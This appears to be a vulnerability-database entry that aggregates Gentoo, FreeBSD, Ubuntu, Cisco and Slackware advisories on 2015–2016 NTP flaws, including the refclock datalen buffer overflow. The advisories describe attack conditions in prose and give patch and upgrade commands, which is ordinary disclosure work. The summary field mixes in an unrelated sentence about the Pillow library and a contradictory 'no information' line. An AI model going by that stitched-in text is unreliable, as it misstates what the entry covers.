"description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "The datalen parameter in the refclock driver in NTP 4.2.x before 4.2.8p4, and 4.3.x before 4.3.77 allows remote attackers to execute arbitrary code or cause a denial of service (crash) via a negative input value. NTP Is vulnerable to a buffer error.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. Pillow is a Python-based image processing library. \nThere is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. Network Time Protocol is prone to a local buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. \nAn attacker may exploit this issue to execute arbitrary code within the context of the application. Failed exploit attempts will likely cause denial-of-service conditions. \nVersions prior to NTP 4.2.8p4 and 4.3.x prior to 4.3.77 are vulnerable. \n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201607-15\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: NTP: Multiple vulnerabilities\n Date: July 20, 2016\n Bugs: #563774, #572452, #581528, #584954\n ID: 201607-15\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in NTP, the worst of which\ncould lead to Denial of Service. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 net-misc/ntp \u003c 4.2.8_p8 \u003e= 4.2.8_p8\n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in NTP. Please review the\nCVE identifiers referenced below for details. \n\nResolution\n==========\n\nAll NTP users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=net-misc/ntp-4.2.8_p8\"\n\nReferences\n==========\n\n[ 1 ] CVE-2015-7691\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7691\n[ 2 ] CVE-2015-7692\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7692\n[ 3 ] CVE-2015-7701\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7701\n[ 4 ] CVE-2015-7702\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7702\n[ 5 ] CVE-2015-7703\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7703\n[ 6 ] CVE-2015-7704\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7704\n[ 7 ] CVE-2015-7705\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7705\n[ 8 ] CVE-2015-7848\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7848\n[ 9 ] CVE-2015-7849\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7849\n[ 10 ] CVE-2015-7850\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7850\n[ 11 ] CVE-2015-7851\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7851\n[ 12 ] CVE-2015-7852\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7852\n[ 13 ] CVE-2015-7853\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7853\n[ 14 ] CVE-2015-7854\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7854\n[ 15 ] CVE-2015-7855\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7855\n[ 16 ] CVE-2015-7871\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7871\n[ 17 ] CVE-2015-7973\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7973\n[ 18 ] CVE-2015-7974\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7974\n[ 19 ] CVE-2015-7975\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7975\n[ 20 ] CVE-2015-7976\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7976\n[ 21 ] CVE-2015-7977\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7977\n[ 22 ] CVE-2015-7978\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7978\n[ 23 ] CVE-2015-7979\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7979\n[ 24 ] CVE-2015-8138\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8138\n[ 25 ] CVE-2015-8139\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8139\n[ 26 ] CVE-2015-8140\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8140\n[ 27 ] CVE-2015-8158\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8158\n[ 28 ] CVE-2016-1547\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1547\n[ 29 ] CVE-2016-1548\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1548\n[ 30 ] CVE-2016-1549\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1549\n[ 31 ] CVE-2016-1550\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1550\n[ 32 ] CVE-2016-1551\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1551\n[ 33 ] CVE-2016-2516\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2516\n[ 34 ] CVE-2016-2517\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2517\n[ 35 ] CVE-2016-2518\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2518\n[ 36 ] CVE-2016-2519\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2519\n[ 37 ] CVE-2016-4953\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4953\n[ 38 ] CVE-2016-4954\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4954\n[ 39 ] CVE-2016-4955\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4955\n[ 40 ] CVE-2016-4956\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4956\n[ 41 ] CVE-2016-4957\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4957\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/201607-15\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2016 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n\n\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=============================================================================\nFreeBSD-SA-15:25.ntp Security Advisory\n The FreeBSD Project\n\nTopic: Multiple vulnerabilities of ntp\n\nCategory: contrib\nModule: ntp\nAnnounced: 2015-10-26\nCredits: Network Time Foundation\nAffects: All supported versions of FreeBSD. \nCorrected: 2015-10-26 11:35:40 UTC (stable/10, 10.2-STABLE)\n 2015-10-26 11:36:55 UTC (releng/10.2, 10.2-RELEASE-p6)\n 2015-10-26 11:37:31 UTC (releng/10.1, 10.1-RELEASE-p23)\n 2015-10-26 11:36:40 UTC (stable/9, 9.3-STABLE)\n 2015-10-26 11:42:25 UTC (releng/9.3, 9.3-RELEASE-p29)\nCVE Name: CVE-2015-7701, CVE-2015-7702, CVE-2015-7703, CVE-2015-7704,\n CVE-2015-7848, CVE-2015-7849, CVE-2015-7850, CVE-2015-7851,\n CVE-2015-7852, CVE-2015-7853, CVE-2015-7854, CVE-2015-7855,\n CVE-2015-7871\n\nFor general information regarding FreeBSD Security Advisories,\nincluding descriptions of the fields above, security branches, and the\nfollowing sections, please visit https://security.FreeBSD.org/. \n\nI. Background\n\nThe ntpd(8) daemon is an implementation of the Network Time Protocol (NTP)\nused to synchronize the time of a computer system to a reference time\nsource. \n\nII. Problem Description\n\nCrypto-NAK packets can be used to cause ntpd(8) to accept time from an\nunauthenticated ephemeral symmetric peer by bypassing the authentication\nrequired to mobilize peer associations. [CVE-2015-7871] FreeBSD 9.3 and\n10.1 are not affected. \n\nIf ntpd(8) is fed a crafted mode 6 or mode 7 packet containing an unusual\nlong data value where a network address is expected, the decodenetnum()\nfunction will abort with an assertion failure instead of simply returning\na failure condition. [CVE-2015-7855]\n\nIf ntpd(8) is configured to allow remote configuration, and if the\n(possibly spoofed) source IP address is allowed to send remote\nconfiguration requests, and if the attacker knows the remote\nconfiguration password or if ntpd(8) was configured to disable\nauthentication, then an attacker can send a set of packets to ntpd(8) that\nmay cause it to crash, with the hypothetical possibility of a small code\ninjection. [CVE-2015-7854]\n\nA negative value for the datalen parameter will overflow a data buffer. \nNTF\u0027s ntpd(8) driver implementations always set this value to 0 and are\ntherefore not vulnerable to this weakness. If you are running a custom\nrefclock driver in ntpd(8) and that driver supplies a negative value for\ndatalen (no custom driver of even minimal competence would do this)\nthen ntpd would overflow a data buffer. It is even hypothetically\npossible in this case that instead of simply crashing ntpd the\nattacker could effect a code injection attack. [CVE-2015-7853]\n\nIf an attacker can figure out the precise moment that ntpq(8) is listening\nfor data and the port number it is listening on or if the attacker can\nprovide a malicious instance ntpd(8) that victims will connect to then an\nattacker can send a set of crafted mode 6 response packets that, if\nreceived by ntpq(8), can cause ntpq(8) to crash. [CVE-2015-7852]\n\nIf ntpd(8) is configured to allow remote configuration, and if the\n(possibly spoofed) IP address is allowed to send remote configuration\nrequests, and if the attacker knows the remote configuration password\nor if ntpd(8) was configured to disable authentication, then an attacker\ncan send a set of packets to ntpd that may cause ntpd(8) to overwrite\nfiles. [CVE-2015-7851]. The default configuration of ntpd(8) within\nFreeBSD does not allow remote configuration. \n\nIf ntpd(8) is configured to allow remote configuration, and if the\n(possibly spoofed) source IP address is allowed to send remote\nconfiguration requests, and if the attacker knows the remote\nconfiguration password or if ntpd(8) was configured to disable\nauthentication, then an attacker can send a set of packets to ntpd\nthat will cause it to crash and/or create a potentially huge log\nfile. Specifically, the attacker could enable extended logging,\npoint the key file at the log file, and cause what amounts to an\ninfinite loop. [CVE-2015-7850]. The default configuration of ntpd(8)\nwithin FreeBSD does not allow remote configuration. \n\nIf ntpd(8) is configured to allow remote configuration, and if the\n(possibly spoofed) source IP address is allowed to send remote\nconfiguration requests, and if the attacker knows the remote\nconfiguration password or if ntpd was configured to disable\nauthentication, then an attacker can send a set of packets to\nntpd that may cause a crash or theoretically perform a code\ninjection attack. [CVE-2015-7849]. The default configuration of ntpd(8)\nwithin FreeBSD does not allow remote configuration. \n\nIf ntpd(8) is configured to enable mode 7 packets, and if the use\nof mode 7 packets is not properly protected thru the use of the\navailable mode 7 authentication and restriction mechanisms, and\nif the (possibly spoofed) source IP address is allowed to send\nmode 7 queries, then an attacker can send a crafted packet to\nntpd that will cause it to crash. [CVE-2015-7848]. The default\nconfiguration of ntpd(8) within FreeBSD does not allow mode 7\npackets. \n\nIf ntpd(8) is configured to use autokey, then an attacker can send\npackets to ntpd that will, after several days of ongoing attack,\ncause it to run out of memory. [CVE-2015-7701]. The default\nconfiguration of ntpd(8) within FreeBSD does not use autokey. \n\nIf ntpd(8) is configured to allow for remote configuration, and if\nthe (possibly spoofed) source IP address is allowed to send\nremote configuration requests, and if the attacker knows the\nremote configuration password, it\u0027s possible for an attacker\nto use the \"pidfile\" or \"driftfile\" directives to potentially\noverwrite other files. [CVE-2015-5196]. The default configuration\nof ntpd(8) within FreeBSD does not allow remote configuration\n\nAn ntpd(8) client that honors Kiss-of-Death responses will honor\nKoD messages that have been forged by an attacker, causing it\nto delay or stop querying its servers for time updates. Also,\nan attacker can forge packets that claim to be from the target\nand send them to servers often enough that a server that\nimplements KoD rate limiting will send the target machine a\nKoD response to attempt to reduce the rate of incoming packets,\nor it may also trigger a firewall block at the server for\npackets from the target machine. For either of these attacks\nto succeed, the attacker must know what servers the target\nis communicating with. An attacker can be anywhere on the\nInternet and can frequently learn the identity of the target\u0027s\ntime source by sending the target a time query. [CVE-2015-7704]\n\nThe fix for CVE-2014-9750 was incomplete in that there were\ncertain code paths where a packet with particular autokey\noperations that contained malicious data was not always being\ncompletely validated. Receipt of these packets can cause ntpd\nto crash. [CVE-2015-7702]. The default configuration of ntpd(8)\nwithin FreeBSD does not use autokey. \n\nIII. Impact\n\nAn attacker which can send NTP packets to ntpd(8), which uses cryptographic\nauthentication of NTP data, may be able to inject malicious time data\ncausing the system clock to be set incorrectly. [CVE-2015-7871]\n\nAn attacker which can send NTP packets to ntpd(8), can block the\ncommunication of the daemon with time servers, causing the system\nclock not being synchronized. [CVE-2015-7704]\n\nAn attacker which can send NTP packets to ntpd(8), can remotely crash\nthe daemon, sending malicious data packet. [CVE-2015-7855] [CVE-2015-7854]\n[CVE-2015-7853] [CVE-2015-7852] [CVE-2015-7849] [CVE-2015-7848]\n\nAn attacker which can send NTP packets to ntpd(8), can remotely\ntrigger the daemon to overwrite its configuration files. [CVE-2015-7851]\n[CVE-2015-5196]\n\nIV. Workaround\n\nNo workaround is available, but systems not running ntpd(8) are not\naffected. Network administrators are advised to implement BCP-38,\nwhich helps to reduce risk associated with the attacks. \n\nV. Solution\n\nPerform one of the following:\n\n1) Upgrade your vulnerable system to a supported FreeBSD stable or\nrelease / security branch (releng) dated after the correction date. \n\nThe ntpd service has to be restarted after the update. A reboot is\nrecommended but not required. \n\n2) To update your vulnerable system via a binary patch:\n\nSystems running a RELEASE version of FreeBSD on the i386 or amd64\nplatforms can be updated via the freebsd-update(8) utility:\n\n# freebsd-update fetch\n# freebsd-update install\n\nThe ntpd service has to be restarted after the update. A reboot is\nrecommended but not required. \n\n3) To update your vulnerable system via a source code patch:\n\nThe following patches have been verified to apply to the applicable\nFreeBSD release branches. \n\na) Download the relevant patch from the location below, and verify the\ndetached PGP signature using your PGP utility. \n\n[FreeBSD 10.2]\n# fetch https://security.FreeBSD.org/patches/SA-15:25/ntp-102.patch.bz2\n# bunzip2 ntp-102.patch.bz2\n# fetch https://security.FreeBSD.org/patches/SA-15:25/ntp-102.patch.asc\n# gpg --verify ntp-102.patch.asc\n\n[FreeBSD 10.1]\n# fetch https://security.FreeBSD.org/patches/SA-15:25/ntp-101.patch.bz2\n# bunzip2 ntp-101.patch.bz2\n# fetch https://security.FreeBSD.org/patches/SA-15:25/ntp-101.patch.asc\n# gpg --verify ntp-101.patch.asc\n\n[FreeBSD 9.3]\n# fetch https://security.FreeBSD.org/patches/SA-15:25/ntp-93.patch.bz2\n# bunzip2 ntp-93.patch.bz2\n# fetch https://security.FreeBSD.org/patches/SA-15:25/ntp-93.patch.asc\n# gpg --verify ntp-93.patch.asc\n\nb) Apply the patch. Execute the following commands as root:\n\n# cd /usr/src\n# patch \u003c /path/to/patch\n# find contrib/ntp -type f -empty -delete\n\nc) Recompile the operating system using buildworld and installworld as\ndescribed in https://www.FreeBSD.org/handbook/makeworld.html. \n\nd) For 9.3-RELEASE and 10.1-RELEASE an update to /etc/ntp.conf is recommended,\nwhich can be done with help of the mergemaster(8) tool on 9.3-RELEASE and\nwith help of the etcupdate(8) tool on 10.1-RELEASE. \n\nRestart the ntpd(8) daemon, or reboot the system. \n\nVI. Correction details\n\nThe following list contains the correction revision numbers for each\naffected branch. \n\nBranch/path Revision\n- -------------------------------------------------------------------------\nstable/9/ r289998\nreleng/9.3/ r290001\nstable/10/ r289997\nreleng/10.1/ r290000\nreleng/10.2/ r289999\n- -------------------------------------------------------------------------\n\nTo see which files were modified by a particular revision, run the\nfollowing command, replacing NNNNNN with the revision number, on a\nmachine with Subversion installed:\n\n# svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base\n\nOr visit the following URL, replacing NNNNNN with the revision number:\n\nhttps://svnweb.freebsd.org/base?view=revision\u0026revision=NNNNNN\n\nVII. References\n\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7701\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7702\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7703\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7704\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7848\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7849\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7850\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7851\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7852\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7853\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7854\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7855\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7871\n\nThe latest revision of this advisory is available at\nhttps://security.FreeBSD.org/advisories/FreeBSD-SA-15:25.ntp.asc\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIcBAEBAgAGBQJWLhOJAAoJEO1n7NZdz2rn91wP/2GwEt1boNQq2a7nYzv/mS5D\nsYKkIi7o+2yr2BLXvtc3O7c9QC3/YeGsza9DTRqndcY572SWvRgtkFstMTTm8IV/\nRVlIE40gVR3tex0zo7BiD7uKUrxWxWcpwMbE5dzlE+vSybyyj0dSSkwUHJjrbJoA\nRmyNuEEUhQn5sRCg6qJv/PLp2G7BcYAasKScukjm7QnLP2kq/tvM9mcqwfh2tadM\n7kbf8uq+ykvsRzctaDnxQaB5+zJxBQYJjBelxQfIkNek0XGfdj3sRwISeFznbllq\nmOLTIBaFiuEtHtusO7MKKavMgS5CQJOvuuvd/l3NY1MnxC6X/1SWig9KIKDIn/hv\nq8dsnq7LLx+tO6Cv4Dub7EbC2ZP3xXGOC4Ie02z8bTZnbX7iwyPUidQQqtU9ra15\nrxzFcZnBxu+yyMNJVsV2qVV/r9OycgKxWlEELC1wYrK9fKfvLdA5aEGjDeU1Z+s6\nJS2zKr0t4F2bMrCsjYP1lQD8sHkCVjwJk+IJU/slcwSajDjBNlMH0yBxGYE1ETIZ\nqMF7/PAkLe8V78pdYmXw9pcaPyhI+ihPLnNrdhX8AI2RX5jDK7IuUNJeUM04UrVB\n8N+mMwgamcuCPWNNyXaL0bz21fexZOuhHmU+B8Yn3SFX5O5b/r9gGvrjo8ei8jOk\nEUlBT3ViDhHNrI7PTaiI\n=djPm\n-----END PGP SIGNATURE-----\n. ============================================================================\nUbuntu Security Notice USN-2783-1\nOctober 27, 2015\n\nntp vulnerabilities\n============================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 15.10\n- Ubuntu 15.04\n- Ubuntu 14.04 LTS\n- Ubuntu 12.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in NTP. (CVE-2015-5146)\n\nMiroslav Lichvar discovered that NTP incorrectly handled logconfig\ndirectives. (CVE-2015-5194)\n\nMiroslav Lichvar discovered that NTP incorrectly handled certain statistics\ntypes. (CVE-2015-5195)\n\nMiroslav Lichvar discovered that NTP incorrectly handled certain file\npaths. (CVE-2015-5196, CVE-2015-7703)\n\nMiroslav Lichvar discovered that NTP incorrectly handled certain packets. (CVE-2015-5219)\n\nAanchal Malhotra, Isaac E. Cohen, and Sharon Goldberg discovered that NTP\nincorrectly handled restarting after hitting a panic threshold. \n(CVE-2015-7691, CVE-2015-7692, CVE-2015-7702)\n\nIt was discovered that NTP incorrectly handled memory when processing\ncertain autokey messages. \n(CVE-2015-7701)\n\nAanchal Malhotra, Isaac E. Cohen, and Sharon Goldberg discovered that NTP\nincorrectly handled rate limiting. A remote attacker could possibly use\nthis issue to cause clients to stop updating their clock. (CVE-2015-7704,\nCVE-2015-7705)\n\nYves Younan discovered that NTP incorrectly handled logfile and keyfile\ndirectives. (CVE-2015-7850)\n\nYves Younan and Aleksander Nikolich discovered that NTP incorrectly handled\nascii conversion. (CVE-2015-7852)\n\nYves Younan discovered that NTP incorrectly handled reference clock memory. \n(CVE-2015-7853)\n\nJohn D \"Doug\" Birdwell discovered that NTP incorrectly handled decoding\ncertain bogus values. (CVE-2015-7855)\n\nStephen Gray discovered that NTP incorrectly handled symmetric association\nauthentication. (CVE-2015-7871)\n\nIn the default installation, attackers would be isolated by the NTP\nAppArmor profile. \n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 15.10:\n ntp 1:4.2.6.p5+dfsg-3ubuntu8.1\n\nUbuntu 15.04:\n ntp 1:4.2.6.p5+dfsg-3ubuntu6.2\n\nUbuntu 14.04 LTS:\n ntp 1:4.2.6.p5+dfsg-3ubuntu2.14.04.5\n\nUbuntu 12.04 LTS:\n ntp 1:4.2.6.p3+dfsg-1ubuntu3.6\n\nIn general, a standard system update will make all the necessary changes. \n\nReferences:\n http://www.ubuntu.com/usn/usn-2783-1\n CVE-2015-5146, CVE-2015-5194, CVE-2015-5195, CVE-2015-5196,\n CVE-2015-5219, CVE-2015-5300, CVE-2015-7691, CVE-2015-7692,\n CVE-2015-7701, CVE-2015-7702, CVE-2015-7703, CVE-2015-7704,\n CVE-2015-7705, CVE-2015-7850, CVE-2015-7852, CVE-2015-7853,\n CVE-2015-7855, CVE-2015-7871\n\nPackage Information:\n https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p5+dfsg-3ubuntu8.1\n https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p5+dfsg-3ubuntu6.2\n https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p5+dfsg-3ubuntu2.14.04.5\n https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p3+dfsg-1ubuntu3.6\n. Versions of this package are affected by one or more vulnerabilities that could allow an unauthenticated, remote attacker to create a denial of service (DoS) condition or modify the time being advertised by a device acting as a network time protocol (NTP) server. \n\nOn October 21st, 2015, NTP.org released a security advisory detailing 13 issues regarding multiple DoS vulnerabilities, information disclosure vulnerabilities, and logic issues that may result in an attacker gaining the ability to modify an NTP server\u0027s advertised time. The vulnerabilities covered in this document are as follows: \n\n CVE-2015-7691 - Denial of Service AutoKey Malicious Message\n CVE-2015-7692 - Denial of Service AutoKey Malicious Message\n CVE-2015-7701 - Denial of Service CRYPTO_ASSOC Memory Leak\n CVE-2015-7702 - Denial of Service AutoKey Malicious Message\n CVE-2015-7703 - Configuration Directive File Overwrite Vulnerability\n CVE-2015-7704 - Denial of Service by Spoofed Kiss-o\u0027-Death\n CVE-2015-7705 - Denial of Service by Priming the Pump\n CVE-2015-7848 - Network Time Protocol ntpd multiple integer overflow read access violations\n CVE-2015-7849 - Network Time Protocol Trusted Keys Memory Corruption Vulnerability\n CVE-2015-7850 - Network Time Protocol Remote Configuration Denial of Service Vulnerability\n CVE-2015-7851 - Network Time Protocol ntpd saveconfig Directory Traversal Vulnerability\n CVE-2015-7852 - Network Time Protocol ntpq atoascii Memory Corruption Vulnerability\n CVE-2015-7853 - Network Time Protocol Reference Clock Memory Corruption Vulnerability\n CVE-2015-7854 - Network Time Protocol Password Length Memory Corruption Vulnerability\n CVE-2015-7855 - Denial of Service Long Control Packet Message \n CVE-2015-7871 - NAK to the Future: NTP Symmetric Association Authentication Bypass Vulnerability\n \nAdditional details on each of the vulnerabilities can be found at the following links:\n\nOfficial Security Advisory from ntp.org: http://support.ntp.org/bin/view/Main/SecurityNotice#Recent_Vulnerabilities\nBoston University: http://www.cs.bu.edu/~goldbe/NTPattack.html\nCisco TALOS: http://talosintel.com/vulnerability-reports/\n\nCisco will release software updates that address these vulnerabilities. \n\nWorkarounds that mitigate one or more of the vulnerabilities may be available for certain products, please see the individual Cisco Bug IDs for details. \n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n+--------------------------+\npatches/packages/ntp-4.2.8p4-i486-1_slack14.1.txz: Upgraded. \n In addition to bug fixes and enhancements, this release fixes\n several low and medium severity vulnerabilities. \n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9750\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5196\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7691\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7692\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7701\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7702\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7704\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7705\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7848\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7849\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7850\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7851\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7852\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7853\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7854\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7855\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7871\n (* Security fix *)\n+--------------------------+\n\n\nWhere to find the new packages:\n+-----------------------------+\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you. \n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/ntp-4.2.8p4-i486-1_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/ntp-4.2.8p4-x86_64-1_slack13.0.txz\n\nUpdated package for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/ntp-4.2.8p4-i486-1_slack13.1.txz\n\nUpdated package for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/ntp-4.2.8p4-x86_64-1_slack13.1.txz\n\nUpdated package for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/ntp-4.2.8p4-i486-1_slack13.37.txz\n\nUpdated package for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/ntp-4.2.8p4-x86_64-1_slack13.37.txz\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/ntp-4.2.8p4-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/ntp-4.2.8p4-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/ntp-4.2.8p4-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/ntp-4.2.8p4-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/ntp-4.2.8p4-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/ntp-4.2.8p4-x86_64-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 13.0 package:\n21dd14178fea17a88c9326c8672ecefd ntp-4.2.8p4-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 package:\n8647479b2007b92ff8598184f2275263 ntp-4.2.8p4-x86_64-1_slack13.0.txz\n\nSlackware 13.1 package:\ne0f122e8e271dc84db06202c03cc0288 ntp-4.2.8p4-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 package:\ndb0aff04b72b3d8c96ca8c8e1ed36c05 ntp-4.2.8p4-x86_64-1_slack13.1.txz\n\nSlackware 13.37 package:\n5914e43e886e5ff88fefd30083493e30 ntp-4.2.8p4-i486-1_slack13.37.txz\n\nSlackware x86_64 13.37 package:\n4335c3bf2ae24afc5ad734e8d80b3e94 ntp-4.2.8p4-x86_64-1_slack13.37.txz\n\nSlackware 14.0 package:\n39b05698797b638b67130e0b170e0a4b ntp-4.2.8p4-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\ndcf4a56ba1d013ee1c9d0e624e158709 ntp-4.2.8p4-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\n1fd3a7beaf23303e2c211af377662614 ntp-4.2.8p4-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\n438c3185aa8ec20d1c2b5e51786e4d41 ntp-4.2.8p4-x86_64-1_slack14.1.txz\n\nSlackware -current package:\n81bfb2fed450cb26a51b5e1cee0d33ed n/ntp-4.2.8p4-i586-1.txz\n\nSlackware x86_64 -current package:\n8bae4ad633af40d4d54b7686e4b225f9 n/ntp-4.2.8p4-x86_64-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the package as root:\n# upgradepkg ntp-4.2.8p4-i486-1_slack14.1.txz\n\nThen, restart the NTP daemon:\n\n# sh /etc/rc.d/rc.ntpd restart\n\n\n+-----+\n\nSlackware Linux Security 